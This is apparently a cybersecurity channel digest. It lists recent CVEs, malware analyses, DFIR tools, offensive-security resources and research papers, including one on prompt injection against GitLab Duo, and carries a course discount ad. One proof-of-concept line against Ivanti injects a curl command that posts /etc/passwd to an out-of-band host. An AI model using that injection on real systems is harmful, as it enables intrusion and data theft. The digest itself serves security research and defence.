İbrahim BALOĞLU - Cyber Security Posts
This group was created to share content in the field of Cyber Security.
#exploit
1⃣ CVE-2025-5333:
RCE in Broadcom Altiris IRM
2⃣ CVE-2025-32813/32814/32815:
Infoblox NetMRI UnauthCI / SQLi / Auth. Bypass
3⃣ CVE-2025-6543:
Citrix NetScaler Memory overflow
4⃣ CVE-2025-24985:
Windows Fast FAT Driver RCE
5⃣ libxml2: Integer overflow leading to heap-buffer-overflow in xmlRegEpxFromParse
6⃣ CVE-2025-29824:
Windows CLFS UaF vulnerability
7⃣ CVE-2025-4919:
Corruption via Math Space in Mozilla Firefox
8⃣ CVE-2025-49127:
Kafbat UI RCE via JMX Unsafe Deserialization
9⃣ CVE-2025-31651:
Apache Tomcat rewrite rule processing component
🔟 CVE-2025-49144:
LPE in Notepad++ v8.8.1 Installer
#Malware_analysis
1. RedDirection Malicious Campaign
2. macOS Odyssey Infostealer
3. Trojanized versions of PuTTY and WinSCP
4. Zip Smuggling:
Utility for creating zip files that smuggle additional data for later extraction + YARA Rule
5. Interlock RAT/NodeSnake
6. Fake Android Money Transfer App
7. Malware in Official GravityForms Plugin
#tools
#DFIR
1. KubeForenSys - tool for collecting Kubernetes cluster data and ingesting it into an Azure Log Analytics workspace for post-compromise analysis
https://github.com/invictus-ir/KubeForenSys
2. FindOldSIDTraces - cross-platform tool to find traces of old SIDs remaining in Active Directory LDAP objects
https://github.com/TheManticoreProject/FindOldSIDTraces
3. Forensic journey:
Breaking down the UserAssist artifact structure
https://securelist.com/userassist-artifact-forensic-value-for-incident-response/116911
]-> UserAssist Parser
#Events
#Offensive_security
"Compromising Workspace from Windows, AD & EntraID", SO-CON 2025.
]-> Cloud Privilege Escalation Awesome Script Suite
// This talk includes demos on abusing GCPW, GCDS, GPS, and Admin Directory Sync.
See also:
SO-CON 2025 Presentation Archive
CVE-2025-47176: Microsoft Outlook - Remote Code Execution
]-> POC
#DFIR
#Whitepaper
#Blue_Team_Techniques
"Windows (10/Servers) Forensics Analysis", v.1.0.
]-> Windows User Activity Analysis
// This whitepaper will help DFIR investigators obtain better and faster evidence during Windows forensic investigations at zero cost, instead of relying on commercial DFIR tools.
#tools
#Offensive_security
1. reverse_ssh - SSH based reverse shell
2. Wsuks - Automating the MITM attack on WSUS
3. Shell as root - Exploiting an SSRF vulnerability on the HTB Down machine
4. Dirty Vanity in Rust
#DFIR
1. PowerShell script to collect memory and disk forensics for DFIR investigations
https://github.com/dwmetz/CyberPipe
2. Stealth Syscall Execution:
Bypassing ETW, Sysmon, and EDR Detection
https://www.darkrelay.com/post/stealth-syscall-execution-bypass-edr-detection
3. Analysis of a suspicious binary found in MicroDicom Viewer installer
https://github.com/darnas11/MicroDicom-Incident-Report
#MLSecOps
"AIRTBench: Measuring Autonomous AI Red Teaming Capabilities in Language Models", 2025.
]-> https://github.com/dreadnode/AIRTBench-Code
#Kernel_Security
#Offensive_security
1. Exploiting a UAF in the vsock subsystem of the Linux kernel (CVE-2025-21756)
https://github.com/google/security-research/blob/f7dbb569a8275d4352fb1a2fe869f1afa79d4c28/pocs/linux/kernelctf/CVE-2025-21756_lts_cos/docs/exploit.md
2. Secure Enclaves for Offensive Operations
Part 1, Part 2
#Research
#Malware_analysis
"MALGUARD: Towards Real-Time, Accurate, and Actionable Detection of Malicious Packages in PyPI Ecosystem", 2025.
]-> Repo: https://zenodo.org/records/15545824
In response to the discount requests we received, you can purchase the Cyber Incident Response Training at a 50% discount throughout this week. 🔥https://www.udemy.com/course/siber-olaylara-mudahale-egitimi-windows-forensics/?couponCode=AB06AD91EEA6097CF368
Ivanti Decrypt Stored SQL
POC
https :// [ivanti-ip/domain]/api/v1/license/keys-status/;curl -X POST -d @/etc/passwd oastify[.]xxxxx
#DFIR
#Whitepaper
#Threat_Research
"A Pebble In the Ocean: Maximizing Log Fidelity In Container Environments", 2025.
]-> Configurations and experiment artifacts
#Offensive_security
Cross-site scripting (XSS) Cheat Sheet, 03 Jun 2025.
#Malware_analysis
1. Malicious Chrome Extensions
https://dti.domaintools.com/dual-function-malware-chrome-extensions
2. Simple SSH Backdoor
https://isc.sans.edu/diary/Simple+SSH+Backdoor/32000
3. Malicious VS Code Extensions
https://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions
#exploit
#Threat_Research
1. Multiple CVEs in Infoblox NetMRI: RCE, Auth Bypass, SQLi, and File Read Vulnerabilities
https://rhinosecuritylabs.com/research/infoblox-multiple-cves
2. Don't Call That "Protected" Method:
Dissecting an N-Day vBulletin RCE
https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
3. Remote Prompt Injection in GitLab Duo
https://www.legitsecurity.com/blog/remote-prompt-injection-in-gitlab-duo
